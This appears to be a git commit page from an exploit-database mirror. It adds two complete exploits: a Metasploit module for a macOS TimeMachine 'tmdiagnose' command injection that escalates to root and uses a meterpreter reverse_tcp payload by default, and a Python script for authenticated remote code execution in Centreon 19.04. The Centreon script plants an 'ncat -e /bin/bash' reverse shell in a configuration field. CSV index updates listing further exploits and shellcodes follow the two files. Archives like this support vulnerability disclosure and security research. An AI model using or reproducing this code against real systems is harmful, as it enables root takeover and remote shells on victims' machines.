DB: 2019-07-03
2 changes to exploits/shellcodes Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit) Linux Mint 18.3-19.1 - 'yelp' Command Injection Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit) Centreon 19.04 - Remote Code Execution Linux/x86 - execve /bin/sh using JMP-CALL-POP Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)
This commit is contained in:
parent
4afcc04eda
commit
808010b53f
4 changed files with 210 additions and 2 deletions
105
exploits/macos/local/47070.rb
Executable file
105
exploits/macos/local/47070.rb
Executable file
|
@ -0,0 +1,105 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Local
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Post::File
|
||||||
|
include Msf::Post::OSX::Priv
|
||||||
|
include Msf::Post::OSX::System
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
include Msf::Exploit::FileDropper
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Mac OS X TimeMachine (tmdiagnose) Command Injection Privilege Escalation',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in
|
||||||
|
order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers
|
||||||
|
from a command injection vulnerability that can be exploited by creating a
|
||||||
|
specially crafted disk label.
|
||||||
|
|
||||||
|
The tmdiagnose binary uses awk to list every mounted volume, and composes
|
||||||
|
shell commands based on the volume labels. By creating a volume label with the
|
||||||
|
backtick character, we can have our own binary executed with root priviledges.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [
|
||||||
|
'CodeColorist', # Discovery and exploit
|
||||||
|
'timwr', # Metasploit module
|
||||||
|
],
|
||||||
|
'References' => [
|
||||||
|
['CVE', '2019-8513'],
|
||||||
|
['URL', 'https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43'],
|
||||||
|
['URL', 'https://support.apple.com/en-in/HT209600'],
|
||||||
|
['URL', 'https://github.com/ChiChou/sploits'],
|
||||||
|
],
|
||||||
|
'DefaultTarget' => 0,
|
||||||
|
'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
|
||||||
|
'Targets' => [
|
||||||
|
[ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
|
||||||
|
[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
|
||||||
|
[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Apr 13 2019'))
|
||||||
|
register_advanced_options [
|
||||||
|
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
||||||
|
]
|
||||||
|
end
|
||||||
|
|
||||||
|
def upload_executable_file(filepath, filedata)
|
||||||
|
print_status("Uploading file: '#{filepath}'")
|
||||||
|
write_file(filepath, filedata)
|
||||||
|
chmod(filepath)
|
||||||
|
register_file_for_cleanup(filepath)
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
version = Gem::Version.new(get_system_version)
|
||||||
|
if version >= Gem::Version.new('10.14.4')
|
||||||
|
CheckCode::Safe
|
||||||
|
else
|
||||||
|
CheckCode::Appears
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
if check != CheckCode::Appears
|
||||||
|
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||||
|
end
|
||||||
|
|
||||||
|
if is_root?
|
||||||
|
fail_with Failure::BadConfig, 'Session already has root privileges'
|
||||||
|
end
|
||||||
|
|
||||||
|
unless writable? datastore['WritableDir']
|
||||||
|
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
|
||||||
|
end
|
||||||
|
|
||||||
|
exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8513", "exploit" ))
|
||||||
|
if target['Arch'] == ARCH_X64
|
||||||
|
root_cmd = payload.encoded
|
||||||
|
else
|
||||||
|
root_cmd = payload.raw
|
||||||
|
if target['Arch'] == ARCH_PYTHON
|
||||||
|
root_cmd = "echo \"#{root_cmd}\" | python"
|
||||||
|
end
|
||||||
|
root_cmd = "CMD:#{root_cmd}"
|
||||||
|
end
|
||||||
|
if root_cmd.length > 1024
|
||||||
|
fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
|
||||||
|
end
|
||||||
|
|
||||||
|
placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
|
||||||
|
exploit_data[placeholder_index, root_cmd.length] = root_cmd
|
||||||
|
|
||||||
|
exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
|
||||||
|
upload_executable_file(exploit_file, exploit_data)
|
||||||
|
|
||||||
|
print_status("Executing exploit '#{exploit_file}'")
|
||||||
|
result = cmd_exec(exploit_file)
|
||||||
|
print_status("Exploit result:\n#{result}")
|
||||||
|
end
|
||||||
|
end
|
101
exploits/php/webapps/47069.py
Executable file
101
exploits/php/webapps/47069.py
Executable file
|
@ -0,0 +1,101 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
'''
|
||||||
|
# Exploit Title: Centreon v19.04 authenticated Remote Code Execution
|
||||||
|
# Date: 28/06/2019
|
||||||
|
# Exploit Author: Askar (@mohammadaskar2)
|
||||||
|
# CVE : CVE-2019-13024
|
||||||
|
# Vendor Homepage: https://www.centreon.com/
|
||||||
|
# Software link: https://download.centreon.com
|
||||||
|
# Version: v19.04
|
||||||
|
# Tested on: CentOS 7.6 / PHP 5.4.16
|
||||||
|
'''
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
import warnings
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
|
||||||
|
# turn off BeautifulSoup warnings
|
||||||
|
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
|
||||||
|
|
||||||
|
if len(sys.argv) != 6:
|
||||||
|
print(len(sys.argv))
|
||||||
|
print("[~] Usage : ./centreon-exploit.py url username password ip port")
|
||||||
|
exit()
|
||||||
|
|
||||||
|
url = sys.argv[1]
|
||||||
|
username = sys.argv[2]
|
||||||
|
password = sys.argv[3]
|
||||||
|
ip = sys.argv[4]
|
||||||
|
port = sys.argv[5]
|
||||||
|
|
||||||
|
|
||||||
|
request = requests.session()
|
||||||
|
print("[+] Retrieving CSRF token to submit the login form")
|
||||||
|
page = request.get(url+"/index.php")
|
||||||
|
html_content = page.text
|
||||||
|
soup = BeautifulSoup(html_content)
|
||||||
|
token = soup.findAll('input')[3].get("value")
|
||||||
|
|
||||||
|
login_info = {
|
||||||
|
"useralias": username,
|
||||||
|
"password": password,
|
||||||
|
"submitLogin": "Connect",
|
||||||
|
"centreon_token": token
|
||||||
|
}
|
||||||
|
login_request = request.post(url+"/index.php", login_info)
|
||||||
|
print("[+] Login token is : {0}".format(token))
|
||||||
|
if "Your credentials are incorrect." not in login_request.text:
|
||||||
|
print("[+] Logged In Sucssfully")
|
||||||
|
print("[+] Retrieving Poller token")
|
||||||
|
|
||||||
|
poller_configuration_page = url + "/main.get.php?p=60901"
|
||||||
|
get_poller_token = request.get(poller_configuration_page)
|
||||||
|
poller_html = get_poller_token.text
|
||||||
|
poller_soup = BeautifulSoup(poller_html)
|
||||||
|
poller_token = poller_soup.findAll('input')[24].get("value")
|
||||||
|
print("[+] Poller token is : {0}".format(poller_token))
|
||||||
|
|
||||||
|
payload_info = {
|
||||||
|
"name": "Central",
|
||||||
|
"ns_ip_address": "127.0.0.1",
|
||||||
|
# this value should be 1 always
|
||||||
|
"localhost[localhost]": "1",
|
||||||
|
"is_default[is_default]": "0",
|
||||||
|
"remote_id": "",
|
||||||
|
"ssh_port": "22",
|
||||||
|
"init_script": "centengine",
|
||||||
|
# this value contains the payload , you can change it as you want
|
||||||
|
"nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
|
||||||
|
"nagiostats_bin": "/usr/sbin/centenginestats",
|
||||||
|
"nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
|
||||||
|
"centreonbroker_cfg_path": "/etc/centreon-broker",
|
||||||
|
"centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
|
||||||
|
"centreonbroker_logs_path": "",
|
||||||
|
"centreonconnector_path": "/usr/lib64/centreon-connector",
|
||||||
|
"init_script_centreontrapd": "centreontrapd",
|
||||||
|
"snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
|
||||||
|
"ns_activate[ns_activate]": "1",
|
||||||
|
"submitC": "Save",
|
||||||
|
"id": "1",
|
||||||
|
"o": "c",
|
||||||
|
"centreon_token": poller_token,
|
||||||
|
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
send_payload = request.post(poller_configuration_page, payload_info)
|
||||||
|
print("[+] Injecting Done, triggering the payload")
|
||||||
|
print("[+] Check your netcat listener !")
|
||||||
|
generate_xml_page = url + "/include/configuration/configGenerate/xml/generateFiles.php"
|
||||||
|
xml_page_data = {
|
||||||
|
"poller": "1",
|
||||||
|
"debug": "true",
|
||||||
|
"generate": "true",
|
||||||
|
}
|
||||||
|
request.post(generate_xml_page, xml_page_data)
|
||||||
|
|
||||||
|
else:
|
||||||
|
print("[-] Wrong credentials")
|
||||||
|
exit()
|
|
@ -10563,6 +10563,7 @@ id,file,description,date,author,type,platform,port
|
||||||
47009,exploits/linux/local/47009.c,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation",2019-06-18,"Guy Levin",local,linux,
|
47009,exploits/linux/local/47009.c,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation",2019-06-18,"Guy Levin",local,linux,
|
||||||
47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,
|
47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,
|
||||||
47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
|
47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
|
||||||
|
47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -17515,7 +17516,7 @@ id,file,description,date,author,type,platform,port
|
||||||
47030,exploits/multiple/remote/47030.py,"SuperDoctor5 - 'NRPE' Remote Code Execution",2019-06-25,"Simon Gurney",remote,multiple,
|
47030,exploits/multiple/remote/47030.py,"SuperDoctor5 - 'NRPE' Remote Code Execution",2019-06-25,"Simon Gurney",remote,multiple,
|
||||||
47031,exploits/hardware/remote/47031.py,"SAPIDO RB-1732 - Remote Command Execution",2019-06-25,k1nm3n.aotoi,remote,hardware,
|
47031,exploits/hardware/remote/47031.py,"SAPIDO RB-1732 - Remote Command Execution",2019-06-25,k1nm3n.aotoi,remote,hardware,
|
||||||
47039,exploits/linux/remote/47039.rb,"Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)",2019-06-26,Metasploit,remote,linux,
|
47039,exploits/linux/remote/47039.rb,"Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)",2019-06-26,Metasploit,remote,linux,
|
||||||
47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection",2019-07-01,b1ack0wl,remote,linux,
|
47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)",2019-07-01,b1ack0wl,remote,linux,
|
||||||
47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware,
|
47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware,
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
|
@ -41452,3 +41453,4 @@ id,file,description,date,author,type,platform,port
|
||||||
47064,exploits/hardware/webapps/47064.txt,"FaceSentry Access Control System 6.4.8 - Remote Command Injection",2019-07-01,LiquidWorm,webapps,hardware,
|
47064,exploits/hardware/webapps/47064.txt,"FaceSentry Access Control System 6.4.8 - Remote Command Injection",2019-07-01,LiquidWorm,webapps,hardware,
|
||||||
47065,exploits/hardware/webapps/47065.txt,"FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery",2019-07-01,LiquidWorm,webapps,hardware,
|
47065,exploits/hardware/webapps/47065.txt,"FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery",2019-07-01,LiquidWorm,webapps,hardware,
|
||||||
47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware,
|
47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware,
|
||||||
|
47069,exploits/php/webapps/47069.py,"Centreon 19.04 - Remote Code Execution",2019-07-02,Askar,webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
|
@ -986,4 +986,4 @@ id,file,description,date,author,type,platform
|
||||||
47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
|
47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
|
||||||
47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
|
47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
|
||||||
47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
|
47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
|
||||||
47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve /bin/sh using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,kiriknik,shellcode,linux_x86
|
47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,kiriknik,shellcode,linux_x86
|
||||||
|
|
|
Loading…
Add table
Reference in a new issue